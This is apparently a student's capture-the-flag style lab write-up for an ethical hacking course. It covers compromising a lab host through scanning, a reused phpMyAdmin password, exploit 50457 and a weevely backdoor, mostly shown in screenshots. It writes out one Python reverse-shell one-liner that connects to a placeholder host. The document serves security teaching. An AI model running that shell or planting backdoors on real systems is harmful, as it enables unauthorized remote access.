> For the complete documentation index, see [llms.txt](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/labs/lab-10.2-exploiting-nancurunir.md).

# Lab 10.2: Exploiting nancurunir

### Target:  nancurunir.shire.org <a href="#docs-internal-guid-cabe9291-7fff-1810-28e2-a7ea408baa49" id="docs-internal-guid-cabe9291-7fff-1810-28e2-a7ea408baa49"></a>

### **Target IP Address**

<figure><img src="https://lh6.googleusercontent.com/UhZLvOlUK6kx66rITYzhMMAVzg5bgiMaZmfA4wMYqN_vQVgMk5XzB_UGfTYkRJZ-08HNSX1OyPs_8u8Lvjx9Mkrg2UzVFXrfRIuL5M_LU60pTbp4SRfm2cTdygXmJwPJriUXny_h7YSzUMELuX3ulM4" alt=""><figcaption><p>nslookup result</p></figcaption></figure>

### **Open Ports**

<figure><img src="https://lh6.googleusercontent.com/W_ygGZAl4loUYFITYjc2GCpBhVxgJCh7kGx_vgI-nnJ3AXNACUUo3KP2RETU0Rg3THvMGY6nfmGROgmQ3n39A2GfSxYIZyXETITumqkRhwCXa00ZG3Q7e7e_v8a3mVA3WHOuVq17khePnq8vv63fgTY" alt=""><figcaption><p>nmap result</p></figcaption></figure>

### **Discovered Vulnerabilities**

<figure><img src="https://lh4.googleusercontent.com/83D7SM22cWhOq4FNw-ug7Xty58Wlg2U5455b2UWkiYg-CJQ1KbHBnBP5ZarxLqo2hGQdyPiFBXzB81izI5WfQuMGkq4-QjiKkolexAQatNPnGWvzL-po_I5UPYfAYSDXEGZbCL1kECkxhlT38jrmrpc" alt=""><figcaption><p>dirb result</p></figcaption></figure>

<figure><img src="https://lh6.googleusercontent.com/VHw3gmhYa3kT2t_vEkBjEwvKK3mKQ4qrSMWyr2nw7vXce7AthQStsUd3VBTidI_RDrCWsb-D4FlwZlAQ71edlHeGPihvqP6zEGrKu8Jr7A9rLNujBR_S8HD7wayzTTKJz2do6l8rUZkc7858Wd8_SlM" alt=""><figcaption><p>searchsploit for Apache</p></figcaption></figure>

<figure><img src="https://lh5.googleusercontent.com/iQo1RKX5xc1CIccDwHSpjo31zA19FnOI60tfKlYRWynghjWAdnLEoqXarK3FJXNYLQ7TcECeb37Szty5elJv3rakW9zBir5kO0ORVrd8evKNLUQLTFbtm6tG2emAe_VQoEdrsHpibNTepI0Q6HLLWts" alt=""><figcaption></figcaption></figure>

Php version 4.8.1

<figure><img src="https://lh6.googleusercontent.com/hyAi2z9NB9jYmGBW0TS9_tBaNEqpWI0-epeOLuXbFx2qKILSI7UcVUSDWptP11uMJ6E8Xud7XQNt2DDGCYgtvYvZtVaCWAHWoA-MF0tMVooyTFpCWodZ3AeWTZ_nzht62Gry9ONfvdCLJlppr-xwtuY" alt=""><figcaption><p>searchsploit for phpmyadmin</p></figcaption></figure>

## **How you achieved a foothold**

### Phpmyadmin user password, password was `shallnotpass`

<figure><img src="https://lh3.googleusercontent.com/BtnTGU8aEPIG9n42rtajVJVJU7dSvGfdaNOtgp9FYR2qZlsr_Y7TNxOO41u9DGOKo7MWMnbjpi95eFvA4bVEwv5HnuyjZoGCMG3e1pMXS83AYnEsLof_4V37xJjvwEJfBprM5sUyE9tlmLzzDUHY-Rs" alt=""><figcaption></figcaption></figure>

### Root user password:

<figure><img src="https://lh3.googleusercontent.com/7Y0PKxgfjQCScFMmLdFN7_BsjHmqe1dsyVPs5iyIAAmEAvpSpdoLq3fzFAPkVkZ0wyc9Zdej6sV-akgFum13GUdaVX3byE-O4rheSiFZ6lMTmJRN5-NRoiA_65rNcieupKIL086kHKje6VnoUEygdH4" alt=""><figcaption><p>How to get the hash for gandalf</p></figcaption></figure>

<figure><img src="https://lh4.googleusercontent.com/5xHbfA5YDsHnH31ZlyywmWI-Ep1CF_7N0vAg-h-XQ5S1HbrtH6N-3zx9og8cmwq5aumFjDYjSOz_KG4QMuisZtpxZui_iDGRMECIAGMlwwGmsWPCawg37XCFDrYuJCQ-Za1SXPgUCrOdcCUP1LqRlMU" alt=""><figcaption><p>The Hash for the gandalf user</p></figcaption></figure>

<figure><img src="https://lh6.googleusercontent.com/4Rlp-6ru4liN_o2Lhy8kLVM3TCjk1iyG6K-d98Kf2rK5OznBJV3W5ZL9JhhsQCr2HZiniYraO-RtLsy8PVTbkWX_-5efxAQJd9vC731ybG4XFBKJYCq7N1R0S2cKJrE-DHVZwz_8trwTthrQtpJ3lIg" alt=""><figcaption><p>Password for gandalf User</p></figcaption></figure>

### Using 50457 to upload backdoor

<figure><img src="https://lh3.googleusercontent.com/-IqZUxbgyHr53X7mqWeGqxTSLLlpiCf66t1TZGZlmsJadtXCECJCgTHfm_haB0jt9HE6novlb6ubV8rYCMnsx7Ft4wnWBWVvNSOg8MQwDA9ILZRnWz6YstZe-WjLxBikrLGiMm4QI4AmvhYnh1qJGTs" alt=""><figcaption></figcaption></figure>

### Backdoor made

<figure><img src="https://lh5.googleusercontent.com/hAP5uxv33xvl5yJ7r8p3bfChTFd1hTmIbHyGip59lNeXVp2zfG9ycx1O3fVmjJBW-lxiyoOyL-9tQQPfyMr-UNuQrYLG4ZLxIER8hBQ0SYFPElhSUtNI9Stn59idqKexIkXtnx7eNkb668k6tZ95c-4" alt=""><figcaption></figcaption></figure>

### Back door uploaded

<figure><img src="https://lh6.googleusercontent.com/Z6ARWJ2Fhqq4E0TzDudiY78cy4QhJHp0_CL2ZnqxU72xSJOcy_D0n37TMbzmRMusjdZmS5_xp35aR6aDjAbWkc_Ip1dP7fncYM-jUZ5-9j5qoNsL0gKf5ptS4WbVdiIyFvR0knaWoWp8S_Oi23FbV-Y" alt=""><figcaption></figcaption></figure>

### Connect to back door

<figure><img src="https://lh4.googleusercontent.com/fcOniVYnafQjv4Vv5okxjpOSSizvECQYDAlhnTaDhdxHpUDe4XurFnFM3TluutiSYsM7OyvWGDTrnt3DPsU2yjpqyLhHTk82nEZkbE-iQL4Gbm1KomJcR4AqkKv39wzJXOy66tfgFK4b2_QzhHIlOZ8" alt=""><figcaption></figcaption></figure>

### Create a reverse shell in weevely:

{% code overflow="wrap" %}

```bash
export RHOST="HOST";export RPORT=PORT;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
```

{% endcode %}

<figure><img src="https://lh3.googleusercontent.com/0nivbXk7a-GGe7Gc_SDxXvuspAklL2NXPDyQu4EkTfyoU1Mhv7jC-08kT7ddsFzoV94OG-oQUIfo-EVmB712iLTJqmNIuchLKtwwu_BxTQ-cAHHjyFWkXbeYEfoLqeZet5kF2OQRt2v1ZloR6WSPZXs" alt=""><figcaption></figcaption></figure>

## **How you achieved root/Administrative level compromise**

### Foot hold using the gandalf user:

<figure><img src="https://lh3.googleusercontent.com/zvT743XzxnxOOOS2zj4nHtFtkWgaBc1yV2XvjE8xZOgZFb4YMD7mhI2pZ2GkSPzyIQJF2TiXAnSmYScyDPuSWRUjSnNVTsyA152CyEBnKDGzlYRHSf4DHu6at_c4e7UYFmudIkIliH2eA7WDXoyDCDI" alt=""><figcaption></figcaption></figure>

### **User Flag**

<figure><img src="https://lh5.googleusercontent.com/bmYOF_87X4eYkT-PFV_ZAQKY553tyH9khTpziQR-bjxGbQN8nddYpTK8shqDXK5YxyZ2ZTx4eReyDGrQwcj-zIc1T0cs2brDM6di2_O0MGczUeKqixZ4KZPfdgpjA9GEd4VJylElqeJ4rPXRh3aByBw" alt=""><figcaption></figcaption></figure>

### **Root Flag**

<figure><img src="https://lh5.googleusercontent.com/S53t74ho9rwL4yl7u9PiV0xOJSdzt1PrzDtMNwvXsjL83XJb3fuE2L26X6YUUcI0DBv43Rj9yxYaeizt_cHSAlGeSJgYlvg4P2VSCb8a5Ei7MyQcOQhRwyAweWoyKowusnO2oPVI8aB_gVKKMyci8iI" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh3.googleusercontent.com/80CiRd5zY4Jbyqe2fb3DbfW6Zogvy8fjPmlXxVPlK5Y8OmmxuFQx3s-GCpLKG42-v78mLacmx2IfY3lyQIyVSnxboUevr-hXVnzxOYhrBteSq1-K7l4cel3dz_e2iJ-WSpaKruyPXh5X2kt-7g2bpYQ" alt=""><figcaption></figcaption></figure>

### **How might the vulnerabilities be mitigated by the system administrator?**

Not using the same mysql root password as host root as well not having a gif on the homepage of the website that is the same as the phpmyadmin user password.

### Reflection

I did have trouble after I got access to the machine using weevely I forgot how to make have reverse shell to be able to leverage the gandalf user.

### Report

<https://docs.google.com/document/d/1bGgOkBr3Hc3sTCex6RufGkkZMEZJ-MWAhUrAFgsWHhM/edit#>
